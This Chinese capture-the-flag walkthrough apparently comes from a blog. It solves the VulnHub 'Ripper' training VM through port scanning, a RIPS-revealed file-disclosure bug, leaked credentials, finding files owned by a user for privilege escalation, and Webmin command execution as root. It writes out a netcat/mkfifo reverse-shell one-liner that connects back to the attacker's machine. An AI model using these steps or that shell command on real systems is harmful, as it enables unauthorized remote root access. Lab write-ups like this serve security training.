VnlnHub Ripper
靶场搭建
靶场下载地址:https://download.vulnhub.com/ripper/Ripper.ova
下载下来是虚拟机.ovf压缩文件,这个靶机是VirtualBox的,直接用VM打开会报错想要用VM打开可以看我这篇文章:如何将VirtualBox虚拟机转换到VMware中_奋斗吧!小胖子的博客-CSDN博客_virtualbox转vmware
打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)
开启虚拟机
靶场搭建完毕
渗透测试
由于不知道靶机ip,所以需要扫描NAT的网段
147为kali攻击机的ip,所以148为靶机ip
扫描靶机端口服务开放情况
开放了22端口,存在SSH服务
开放了80端口存在http服务,且中间件为Apache2.4.29
开放了10000端口,存在http服务,且中间件为MiniServ1.910(Webmin)
先访问一下80端口的WEB
为Apache初始页面
搜索一下敏感目录,使用了不同工具不同字典,但是没有发现其它敏感目录
所以我们先去看一下10000端口的WEB
让我们访问https://bogon:10000。,所以我们需要把这个域名添加到hosts文件中
访问发现是Webmin的后台登录页面
先尝试一下是否存在admin/admin/admin123这样的弱口令,发现不存在
搜索一下敏感目录
发现存在robots.txt,里面有一段base64编码
解码
提示说他们用rips扫描php代码
通过搜索知道它是一个PHP源代码审计工具RIPS
并且使用rips,可能会存在rips路径
尝试访问,发现没有
猜测可能是在80端口上,尝试访问,发现果然再80端口上
这是一个代码审计,找是否存在漏洞的自动化工具,所以我们再WEB的根目录(/var/www)扫描,并且勾选扫描子目录选项,进行扫描
扫描成功,查看结果
查找看是否存在可以利用的漏洞,发现存在文件泄露并且存在file参数
尝试利用,发现可以读网站根路径下的文件,但是不能读取web路径以外的路径
发现这个漏洞只能用于读取文件,不会进行解析
所以我们只能尝试去读取一些敏感信息
这个代码审计工具有搜索的功能,尝试看能不能搜索到关于账号密码的信息
搜索发现了一组用户名和密码
ssh服务是开启的,尝试登录,发现登录成功
获得到第一个flag
还发现一个可疑文件,但是为空,好像是让我们sudo提权为admin
但是发现没有sudo命令
在/home目录下发现还存在一个叫做cubes的用户,我们可能需要先提权到这个用户
使用其它方式提权
需要提权到cubes用户,所以我们现在找cubes权限的文件,并且可以被ripper读的文件
通过命令
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件
发现secret.file文件,查看文件
发现一段密码,猜测是cubes用户的密码,尝试登录,登录成功
尝试再次提权到root,sudo提权、suid提权、内核提权都不行
在尝试通过同样的方法在找找有什么其它特殊文件
发现有很多没用的目录和文件,经过过滤得到结果
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v '.png' | grep -v '/proc' | grep -v '/sys'发现一个miniser.log日志文件
在其中发现一对账号密码
猜测是登录webmin后台的,因为在webmin目录下
尝试登陆,登录成功
在左下角发现可以直接执行命令
发现权限为root
利用这个命令执行再反弹一个shell
先监听端口,然后执行命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f
获得第二个flag
此版本的webmin也存在rce漏洞,但是也需要账号密码,登陆后也可以通过漏洞来获得shell
VnlnHub Ripper相关推荐
- John the Ripper
John the Ripper John the Ripper(简称John)是一款著名的密码破解工具.它主要针对各种Hash加密的密文.它不同于Rainbow Table方式.它采用实时运算的方式和 ...
- RIPPER算法原理
在众多分类算法中,决策树作为一种基于有监督学习的层次模型被大量使用,其有一种其他算法难以比拟的优点:可解释性强--通过将学习到的决策树可以很轻易的转换成"如果-那么"形式的规则.但 ...
- StreamBox Ripper 将rm转mp3时候出现g2支持的问题
利用StreamBox Ripper(很多网站有下,很小的绿色软件,使用方便)可以将rm格式的 文件转换成mp3格式的文件但是一般大家安装的是realpalyer 10,StreamBox Rippe ...
- John the Ripper 密码破解者
John the Ripper
- 利用 John the Ripper 破解用户登录密码
一.什么是 John the Ripper ? 看到这个标题,想必大家都很好奇,John the Ripper 是个什么东西呢?如果直译其名字的话就是: John 的撕裂者(工具). 相比大家都会觉得 ...
- John the Ripper 著名密码破解工具
著名密码破解工具 John the Ripper 发布了 1.9.0-jumbo-1 版本. John the Ripper 是一款速度很快的密码破解工具,目前可用于 Unix.macOS.Windo ...
- Ninja ripper 工具使用教程
Ninja ripper 是一款用来导出任何安卓游戏的美术资源的工具.理论上可以导出任何游戏的模型,贴图.因为他的原理,不是解密程序,而是在运行时,接管D3D的API,从渲染API的参数中,获取美术 ...
- ninja ripper新版教程
之前的ninja ripper因为版本太旧了,对新的游戏可能支持不好,加上发现自己原本的教程也有一些问题,因此在这里重新写个新的教程_(:зゝ∠)_ 这个教程是以目前的最新版ninja ripper ...
- 还在寻找一款DVD全能转换器吗?WinX DVD Ripper for Mac它不香吗?
适用于Mac的WinX DVD Ripper (V6.2.0 Dec-13-2018)备份和翻录DVD到Mac iTunes iPhone iPod iPad Android具有顶级质量适用于Mac的 ...
最新文章
- GoogLeNet代码解读
- 【数据分析实例】数据领域的兄弟们的数据分析
- 在同一个workprocess里对两张表分别使用online update和update function module update
- 【转】Win10系统怎么设置无线做AP热点_win10设置无线为ap热点的步骤
- boost互斥锁_boost锁使用总结
- python 只去除英文_如何使用 Python 制作词云(Word Cloud)-英文词云篇
- C#-XML-数据传输
- AI智能电话销售机器人源码搭建部署系统电话机器人源码
- 加速Web开发的9款知名HTML5框架
- idea破解版下载 + 最常用快捷键记录
- 怎么p出模糊的照片_照片模糊了怎么办 如何利用美图秀秀变清晰
- zookeeper 集群 + kafka 集群 : 安装部署(附单机部署)
- win10重装系统后没有网卡驱动
- Tomcat 漏洞修复建议
- 长江学者石照耀剖析精密减速机国产化之路—山坳上的机器人精密减速器
- 【经验总结】keil报错:declaration may not appear after executable statement in block···
- 好久没来,深夜来一发
- ubuntu 18.04下解决网易云音乐打不开的问题
- 京东之鉴:兄弟是兄弟,员工是员工!-千氪
- 苹果用计算机知道密码,苹果电脑钥匙串登录密码忘了怎么办